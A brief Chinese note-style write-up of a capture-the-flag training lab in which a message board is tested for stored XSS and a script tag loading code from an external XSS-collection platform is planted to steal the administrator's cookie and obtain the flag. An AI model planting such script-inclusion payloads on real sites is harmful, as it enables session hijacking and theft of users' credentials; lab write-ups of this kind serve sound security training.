mbp 封神臺靶場 四 (筆記)

打開鏈接,發現是個留言板,嘗試xss注入,看看是否可行。 彈出1提示並發現字段變灰,說明注入成功,登錄xss平臺創建項目。 將此代碼段植入剛纔的區域中<script src=http://xsspt.com/2gVqle></script>然後查看項目內容發現flag 總結:本關主要是通過xss注入拿到管理員cookie的,見框就插是xss注入的常用手段,它主要通過用戶輸入當作html語句在頁面上
相關文章
相關標籤/搜索